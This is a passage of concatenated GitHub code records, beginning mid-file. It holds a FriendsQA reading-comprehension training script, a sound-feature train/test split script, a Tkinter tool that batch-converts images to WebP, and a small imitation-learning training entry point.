(any(nd in n for nd in no_decay)) and p.requires_grad == True], 'weight_decay': 0.0}\r\n ]\r\n\r\n all_optimizer = AdamW(optimizer_grouped_parameters, lr=args.learning_rate, eps=args.adam_epsilon)\r\n t_total = len(train_loader) * args.epochs\r\n num_warmup_steps = int(t_total * args.warmup_proportion)\r\n scheduler = get_linear_schedule_with_warmup(all_optimizer, num_warmup_steps=num_warmup_steps,\r\n num_training_steps=t_total)\r\n logging_step = t_total // (args.epochs * 5)\r\n steps = 0\r\n\r\n for epoch in range(args.epochs):\r\n avg_loss, avg_span_loss, avg_utter_loss, avg_speaker_loss = 0, 0, 0, 0\r\n pbar = tqdm(enumerate(train_loader), total=len(train_loader))\r\n for _, batch in pbar:\r\n # for batch in train_loader:\r\n inputs = {'input_ids': batch['input_ids'],\r\n 'token_type_ids': batch['token_type_ids'],\r\n 'attention_mask': batch['attention_mask'],\r\n 'p_mask': batch['p_mask'],\r\n 'utterance_ids_dict': batch['utterance_ids_dict'],\r\n 'start_pos': batch['start_pos'],\r\n 'end_pos': batch['end_pos']\r\n }\r\n if args.add_speaker_mask:\r\n inputs.update({'speaker_ids_dict': batch['speaker_ids_dict']})\r\n outputs = model(**inputs)\r\n loss = outputs[0]\r\n loss.backward()\r\n torch.nn.utils.clip_grad_norm_(model.parameters(), args.max_grad_norm)\r\n all_optimizer.step()\r\n if t_total is not None:\r\n scheduler.step()\r\n if len(outputs) == 2: # without SUP\r\n span_loss = outputs[1].item()\r\n pbar.set_description(\"Epoch:%d | Loss:%.3f | SL:%.3f\" \\\r\n % (epoch, loss.item(), span_loss))\r\n avg_loss += loss\r\n avg_span_loss += span_loss\r\n elif len(outputs) == 4: # with SUP\r\n span_loss = outputs[1].item()\r\n utter_loss = outputs[2].item()\r\n speaker_loss = outputs[3].item()\r\n pbar.set_description(\"Epoch:%d | Loss:%.3f | SL:%.3f | UL:%.3f | SpeakerL:%.3f\" \\\r\n % (epoch, loss.item(), span_loss, utter_loss, speaker_loss))\r\n avg_loss += loss\r\n avg_span_loss += span_loss\r\n avg_utter_loss += utter_loss\r\n avg_speaker_loss += speaker_loss\r\n\r\n model.zero_grad()\r\n\r\n # evaluation\r\n #if True:\r\n if steps != 0 and steps % logging_step == 0:\r\n print(\"\\n\" + \"=\" * 10 + \"evaluation\" + \"=\" * 10)\r\n print(\"Epoch {}, Step {}\".format(epoch, steps))\r\n with torch.no_grad():\r\n eval_result = evaluate(model, eval_dataloader, tokenizer, is_test=False)\r\n test_result = evaluate(model, test_dataloader, tokenizer, is_test=True)\r\n print(\"Eval Result:\", eval_result)\r\n print(\"Test Result:\", test_result)\r\n\r\n # save model on dev\r\n if eval_result['em'] + eval_result['f1'] > save_dev_em + save_dev_f1:\r\n save_dev_f1 = eval_result['f1']\r\n save_dev_em = eval_result['em']\r\n torch.save(model.state_dict(), model_save_path)\r\n result = {\"epoch\": epoch, \"test\": test_result, \"dev\": eval_result}\r\n print(\"save model with only dev em: %f,f1: %f\" % (save_dev_em, save_dev_f1))\r\n print(\"test em: %f,f1: %f\" % (test_result['em'], test_result['f1']))\r\n with open(result_json, \"w\") as f:\r\n json.dump(result, f)\r\n\r\n steps += 1\r\n print(\"epoch: \", epoch)\r\n print(\r\n \"\\nAverage Loss:%.3f | SpanLoss:%.3f |\" \\\r\n % (avg_loss / len(train_loader), avg_span_loss / len(train_loader)))\r\n\r\n\r\ndef evaluate(model, eval_loader, tokenizer, is_test=False):\r\n if not os.path.exists(args.save_path):\r\n os.mkdir(args.save_path)\r\n\r\n model.eval()\r\n answer_dict, na_dict = {}, {}\r\n correct_num, all_num = 0, 0\r\n target_file_path = 'data/FriendsQA/' + ('tst' if is_test else 'dev') + '_uids_target.json'\r\n with open(target_file_path, \"r\") as f:\r\n target_uids_dict = json.load(f)\r\n\r\n for batch in eval_loader:\r\n cur_batch_size = len(batch['input_ids'])\r\n\r\n inputs = {'input_ids': batch['input_ids'],\r\n 'token_type_ids': batch['token_type_ids'],\r\n 'attention_mask': batch['attention_mask'],\r\n 'p_mask': batch['p_mask'],\r\n 'context': batch['context'],\r\n 'utterance_ids_dict': batch['utterance_ids_dict'],\r\n 'offset_mapping': batch['offset_mapping'],\r\n 'qid': batch['qid']\r\n }\r\n if args.add_speaker_mask:\r\n inputs.update({'speaker_ids_dict': batch['speaker_ids_dict']})\r\n outputs = model(**inputs)\r\n answer_list = outputs[0]\r\n if args.add_speaker_mask:\r\n b_correct_num, b_all_num = outputs[1]\r\n correct_num += b_correct_num\r\n all_num += b_all_num\r\n for qid, ans_record in answer_list:\r\n real_qid = qid.split('-')[0]\r\n offset = int(qid.split('-')[1])\r\n ans_record['span_pred_uid'] += offset\r\n if 'model_pred_uid' in ans_record.keys(): ans_record['model_pred_uid'] += offset\r\n if real_qid not in answer_dict.keys():\r\n answer_dict[real_qid] = ans_record\r\n else:\r\n cur_best_prob = answer_dict[real_qid]['prob']\r\n if ans_record['prob'] > cur_best_prob:\r\n answer_dict[real_qid] = ans_record\r\n # computing utterance matching (UM)\r\n assert len(answer_dict) == len(target_uids_dict)\r\n all_example_num, model_pred_correct_num, span_um_num = len(answer_dict), 0, 0\r\n for qid, target_uids in target_uids_dict.items():\r\n ans_record = answer_dict[qid]\r\n span_um_num += 1 if ans_record['span_pred_uid'] in target_uids else 0\r\n if 'model_pred_uid' in ans_record.keys():\r\n model_pred_correct_num += 1 if ans_record['model_pred_uid'] in target_uids else 0\r\n model_um = model_pred_correct_num / all_example_num\r\n span_um = span_um_num / all_example_num\r\n\r\n # computing f1 and em using official SQuAD transcript\r\n answer_dict = {qid: ans_record['answer_text'] for qid, ans_record in answer_dict.items()}\r\n with open(args.pred_file, \"w\") as f:\r\n json.dump(answer_dict, f, indent=2)\r\n if args.add_speaker_mask:\r\n print(\"Speaker prediction acc: %.5f\" % (correct_num / all_num))\r\n evaluate_options = EVAL_OPTS(data_file=test_path if is_test else eval_path,\r\n pred_file=args.pred_file,\r\n na_prob_file=None)\r\n res = evaluate_on_squad(evaluate_options)\r\n em = res['exact']\r\n f1 = res['f1']\r\n rtv_dict = {'em': em, 'f1': f1, 'um': span_um, 'model_um': model_um}\r\n model.train()\r\n\r\n return rtv_dict\r\n\r\n\r\nif __name__ == \"__main__\":\r\n print(args.model_type)\r\n set_seed()\r\n MRCModel = MRC_MODEL_LIST[args.model_num].MRCModel\r\n print(\"model:\", MRC_MODEL_LIST[args.model_num])\r\n\r\n tokenizer = tokenizer_class.from_pretrained(args.model_name)\r\n config = config_class.from_pretrained(args.model_name)\r\n if args.model_type != 'xlnet':\r\n config.start_n_top = 5\r\n config.end_n_top = 5\r\n\r\n # create datasets\r\n train_dataset = get_dataset(train_path, args.cache_path, \\\r\n tokenizer, args.max_length, training=True)\r\n eval_dataset = get_dataset(eval_path, args.cache_path, \\\r\n tokenizer, args.max_length, training=False)\r\n test_dataset = get_dataset(test_path, args.cache_path, \\\r\n tokenizer, args.max_length, training=False)\r\n\r\n train_sampler = RandomSampler(train_dataset)\r\n\r\n train_dataloader = DataLoader(train_dataset, sampler=train_sampler, batch_size=args.batch_size,\r\n collate_fn=collate_fn)\r\n\r\n eval_sampler = SequentialSampler(eval_dataset)\r\n eval_dataloader = DataLoader(eval_dataset, sampler=eval_sampler, batch_size=args.batch_size, collate_fn=collate_fn)\r\n test_sampler = SequentialSampler(test_dataset)\r\n test_dataloader = DataLoader(test_dataset, sampler=test_sampler, batch_size=args.batch_size, collate_fn=collate_fn)\r\n\r\n model = MRCModel.from_pretrained(args.model_name, config=config)\r\n\r\n if hasattr(model, 'load_mha_params'):\r\n print(\"Loading multi-head attention parameters from pretrained model...\")\r\n model.load_mha_params()\r\n print(\"===========================================\")\r\n if os.path.exists(pretrained_model_path):\r\n # if True:\r\n # load checkpoint on SQuAD\r\n model.load_state_dict(torch.load(pretrained_model_path), strict=False)\r\n print(\"=\" * 10 + \"load pretrained model\" + \"=\" * 10)\r\n model = model.to(device)\r\n train(model, train_dataloader, eval_dataloader, test_dataloader, tokenizer)\r\n else:\r\n print(\"Please run train_squad first.\")\r\n\r\n model = model.to(device)\r\n load_checkpoint = True\r\n if load_checkpoint:\r\n model.load_state_dict(torch.load(model_save_path))\r\n print(\"=\" * 10 + \"load checkpoint\" + \"=\" * 10)\r\n # eval\r\n print(\"=\" * 10 + \"start evaluation\" + \"=\" * 10)\r\n with torch.no_grad():\r\n eval_result = evaluate(model, eval_dataloader, tokenizer, is_test=False)\r\n test_result = evaluate(model, test_dataloader, tokenizer, is_test=True)","repo_name":"xyzhu20/Memory-Network-with-Logistic-Inference","sub_path":"FriendsQA/train_friendsqa.py","file_name":"train_friendsqa.py","file_ext":"py","file_size_in_byte":12758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31247361761","text":"import numpy as np\nimport random\nimport pickle\nfrom sklearn import preprocessing\nfrom sklearn.model_selection import train_test_split, StratifiedShuffleSplit\n\n# dimension order: [timbre, pitch, dynamics, richness, attack]\n\ntest_size = 0.2\n\nfeature_all, label_all = pickle.load(open('dataset/allData.pkl', 'rb'))\n\nlabel_timbre_all = [label_single_sound[0] for label_single_sound in label_all]\nlabel_pitch_all = [label_single_sound[1] for label_single_sound in label_all]\nlabel_dynamics_all = [label_single_sound[2] for label_single_sound in label_all]\nlabel_richness_all = [label_single_sound[3] for label_single_sound in label_all]\nlabel_attack_all = [label_single_sound[4] for label_single_sound in label_all]\n\nprint('total sample size:')\nprint(len(label_timbre_all))\n\nprint('bad sample size:')\nprint(len([ii for ii in label_timbre_all if ii == 0]))\n\ndef splitFromLabel(sss, label_all):\n \"\"\"\n split features to train and test sets and return indices\n :param sss:\n :param label_all:\n :return:\n \"\"\"\n for train_index, test_index in sss.split(feature_all, label_all):\n print(len(train_index))\n print(len(test_index))\n X_train = [feature_all[tpi] for tpi in train_index]\n y_train = [label_all[tpi] for tpi in train_index]\n\n X_test = [feature_all[tpi] for tpi in test_index]\n y_test = [label_all[tpi] for tpi in test_index]\n\n return X_train, X_test, y_train, y_test, train_index, test_index\n\ndef featureScaling(X_train, X_test):\n \"\"\"\n Scaling features by X_train\n :param X_train:\n :param X_test:\n :return:\n \"\"\"\n X_train_concat = np.concatenate(X_train, axis=0)\n print(X_train_concat.shape)\n\n scaler = preprocessing.StandardScaler()\n scaler.fit(X_train_concat)\n\n for ii in xrange(len(X_train)):\n X_train[ii] = scaler.transform(X_train[ii])\n\n for ii in xrange(len(X_test)):\n X_test[ii] = scaler.transform(X_test[ii])\n\n return X_train, X_test, scaler\n\ndef saveTestScaler(X_test, y_test, train_index, scaler, feature_string):\n pickle.dump((X_test, y_test), open('./dataset/testData_'+feature_string+'.pkl', 'wb'))\n pickle.dump(scaler, open('./dataset/scaler_'+feature_string+'_train.pkl', 'wb'))\n pickle.dump(train_index, open('./dataset/trainIndex_'+feature_string+'.pkl', 'wb'))\n\nsss = StratifiedShuffleSplit(n_splits=1, test_size=test_size, random_state=0)\n\n# sss.get_n_splits(feature_all, label_timbre_all)\n# for train_timbre_index, test_timbre_index in sss.split(feature_all, label_timbre_all):\n# print(train_timbre_index)\n# print(test_timbre_index)\n\nprint('timbre')\nsss.get_n_splits(feature_all, label_timbre_all)\nX_timbre_train, X_timbre_test, y_timbre_train, y_timbre_test, train_timbre_index, test_timbre_index = splitFromLabel(sss, label_timbre_all)\n_, X_timbre_test, scaler_timbre_train = featureScaling(X_timbre_train, X_timbre_test)\nsaveTestScaler(X_timbre_test, y_timbre_test, train_timbre_index, scaler_timbre_train, 'timbre')\n\n# # pitch\n# print('pitch')\n# sss.get_n_splits(feature_all, label_pitch_all)\n# X_pitch_train, X_pitch_test, y_pitch_train, y_pitch_test, train_pitch_index, test_pitch_index = splitFromLabel(sss, label_pitch_all)\n# _, X_pitch_test, scaler_pitch_train = featureScaling(X_pitch_train, X_pitch_test)\n# saveTestScaler(X_pitch_test, y_pitch_test, train_pitch_index, scaler_pitch_train, 'pitch')\n#\n# # dynamics\n# print('dynamics')\n#\n# sss.get_n_splits(feature_all, label_dynamics_all)\n# X_dynamics_train, X_dynamics_test, y_dynamics_train, y_dynamics_test, train_dynamics_index, test_dynamics_index = splitFromLabel(sss, label_dynamics_all)\n# _, X_dynamics_test, scaler_dynamics_train = featureScaling(X_dynamics_train, X_dynamics_test)\n# saveTestScaler(X_dynamics_test, y_dynamics_test, train_dynamics_index, scaler_dynamics_train, 'dynamics')\n#\n# # richness\n# print('richness')\n#\n# sss.get_n_splits(feature_all, label_richness_all)\n# X_richness_train, X_richness_test, y_richness_train, y_richness_test, train_richness_index, test_richness_index = splitFromLabel(sss, label_richness_all)\n# _, X_richness_test, scaler_richness_train = featureScaling(X_richness_train, X_richness_test)\n# saveTestScaler(X_richness_test, y_richness_test, train_richness_index, scaler_richness_train, 'richness')\n#\n# # attack\n# print('attack')\n#\n# sss.get_n_splits(feature_all, label_attack_all)\n# X_attack_train, X_attack_test, y_attack_train, y_attack_test, train_attack_index, test_attack_index = splitFromLabel(sss, label_attack_all)\n# _, X_attack_test, scaler_attack_train = featureScaling(X_attack_train, X_attack_test)\n# saveTestScaler(X_attack_test, y_attack_test, train_attack_index, scaler_attack_train, 'attack')\n\n\n# X_timbre_train, X_timbre_test, y_timbre_train, y_timbre_test = \\\n# train_test_split(feature_all, label_timbre_all, test_size=test_size, stratify=label_timbre_all)\n#\n# print(len(X_timbre_train), len(X_timbre_test), len(y_timbre_train), len(y_timbre_test))\n# print(X_timbre_train[0].shape)\n\n\n# X_timbre_train, X_timbre_test, scaler = featureScaling(X_timbre_train, X_timbre_test)\n#\n# pickle.dump(scaler, open('./dataset/scaler_timbre_train.pkl', 'wb'))\n# pickle.dump((X_timbre_train, y_timbre_train), open('./dataset/trainData_timbre.pkl', 'wb'))\n# pickle.dump((X_timbre_test, y_timbre_test), open('./dataset/testData_timbre.pkl', 'wb'))","repo_name":"ronggong/goodsoundsEvaluator","sub_path":"trainingDataPrepSingleDim.py","file_name":"trainingDataPrepSingleDim.py","file_ext":"py","file_size_in_byte":5327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4917520719","text":"import ctypes\nimport sys\nimport os\nimport tkinter as tk\nfrom tkinter import filedialog, simpledialog\nfrom PIL import Image\n\ndef set_console_title():\n ctypes.windll.kernel32.SetConsoleTitleW(\"Opti-WebP\")\n\ndef display_initial_message():\n print(\"Opti-WebP - Image Optimization Tool\")\n print(\"Opti-WebP will bulk resize, compress and convert non WebP images to an optimized WebP final version.\")\n print(\"Created by John Large aka bloom\")\n print(\"Website: https://studiobloom.xyz\")\n print(\"If this tool helps you, please consider buying me donating:\\n$studiobloomxyz on cash app, paypal.me/studiobloomxyz\\nBTC @ 33bhGfzcKekYh8oB31Jzv5FYUkdahyC3eA\\nETH @ 0xD974b9ab6e897d1128F2aFe98Aa172dE8180D27E\")\n print(\"\\n\\n\")\n print(\"Choose the directory of the image(s) to be optimized.\\nProceed through the following window prompts.\")\n\ndef select_directory():\n root = tk.Tk()\n root.withdraw()\n directory = filedialog.askdirectory()\n return directory\n\ndef get_icon_path():\n if hasattr(sys, '_MEIPASS'):\n return os.path.join(sys._MEIPASS, 'opti-webp.ico')\n else:\n return os.path.join(os.path.dirname(os.path.abspath(__file__)), 'opti-webp.ico')\n\nclass MaxDimensionSizeDialog(tk.Toplevel):\n def __init__(self, parent):\n super().__init__(parent)\n self.title(\"Max Dimension Size\")\n self.iconbitmap(get_icon_path())\n self.geometry(\"300x250\")\n self.resizable(False, False)\n\n self.max_dimension_size = None\n self.create_widgets()\n\n def create_widgets(self):\n label = tk.Label(self, text=\"Limit max width/height of image(s).\\nAspect Ratio will remain locked.\\n(between 500px-4000px is suggested)\\nEnter the maximum dimension size:\")\n label.pack(pady=10)\n\n self.entry = tk.Entry(self)\n self.entry.pack()\n\n button = tk.Button(self, text=\"OK\", command=self.set_max_dimension_size)\n button.pack(pady=10)\n \n def set_max_dimension_size(self):\n try:\n self.max_dimension_size = int(self.entry.get())\n except ValueError:\n pass\n self.destroy()\n \ndef get_max_dimension_size():\n root = tk.Tk()\n root.withdraw()\n dialog = MaxDimensionSizeDialog(root)\n root.wait_window(dialog)\n return dialog.max_dimension_size\n\ndef count_images(directory):\n image_count = sum([filename.lower().endswith((\".png\", \".jpg\", \".jpeg\", \".gif\", \".bmp\", \".heic\", \".tiff\", \".tif\")) for filename in os.listdir(directory)])\n print(f\"Optimizable Images found in directory: {image_count}\")\n return image_count\n\ndef resize_and_convert(directory, max_dimension_size):\n image_count = count_images(directory)\n if image_count == 0:\n print(\"No optimizable images found.\")\n return\n\n print(f\"Processing images in directory: {directory}\")\n for filename in os.listdir(directory):\n try:\n if filename.lower().endswith((\".png\", \".jpg\", \".jpeg\", \".gif\", \".bmp\", \".heic\", \".tiff\", \".tif\")):\n print(f\"Processing image: {filename}\")\n img = Image.open(os.path.join(directory, filename))\n img.thumbnail((max_dimension_size, max_dimension_size))\n\n # Save as PNG\n new_filename = os.path.splitext(filename)[0] + \"_resized.png\"\n img.save(os.path.join(directory, new_filename), \"PNG\", optimize=True)\n print(f\"Saved resized image as: {new_filename}\")\n\n # Convert to WebP\n webp_filename = os.path.splitext(filename)[0] + \".webp\"\n img.save(os.path.join(directory, webp_filename), \"WEBP\")\n print(f\"Converted image to WebP: {webp_filename}\")\n\n # Delete resized PNG file\n os.remove(os.path.join(directory, new_filename))\n print(f\"Deleted resized image: {new_filename}\")\n\n except Exception as e:\n print(f\"An error occurred while processing image {filename}: {e}\")\n\nif __name__ == \"__main__\":\n set_console_title()\n display_initial_message()\n directory = select_directory()\n if directory:\n max_dimension_size = get_max_dimension_size()\n if max_dimension_size:\n resize_and_convert(directory, max_dimension_size)\n \n # Keep the command window open and prompt the user to restart\n while True:\n user_input = input(\"Your conversion is now complete, thank you for using Opti-WebP:)\\nType 'r' to run the script again, or press enter to exit:\")\n if user_input.lower() == \"r\":\n set_console_title()\n directory = select_directory()\n if directory:\n max_dimension_size = get_max_dimension_size()\n if max_dimension_size:\n resize_and_convert(directory, max_dimension_size)\n else:\n break\n","repo_name":"studiobloom/opti-webp","sub_path":"opti-webp.py","file_name":"opti-webp.py","file_ext":"py","file_size_in_byte":4840,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"61"} +{"seq_id":"6726230919","text":"import argparse\nimport sys\n\nfrom train import *\n\n\ndef main():\n sys.path.append(\"../\")\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--history_length\", default=1)\n parser.add_argument(\"--save\", default=True)\n parser.add_argument(\"--batch_size\", default=64)\n parser.add_argument(\"--epochs\", default=3)\n parser.add_argument(\"--lr\", default=1e-4)\n parser.add_argument(\"--study_name\", default=\"training\")\n args = parser.parse_args()\n if args.save:\n print(f\"Reading Data\")\n data = read_data(\"./data\")\n print(f\"Image count {data[0].shape[0]}\")\n print(f\"Preprocessing\")\n train_data, validation, weights = preprocessing(*data, bool(args.save), int(args.history_length))\n else:\n print(f\"Reading Data\")\n train_data = torch.load(\"./data/training\")\n validation = torch.load(\"./data/validation\")\n weights = torch.load(\"./data/sample_weight\")\n print(f\"Training\")\n train_model(train_data, validation, weights, int(args.batch_size), int(args.epochs), float(args.lr),\n args.study_name, history_length=int(args.history_length))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"aselimc/Imitation_Learning","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}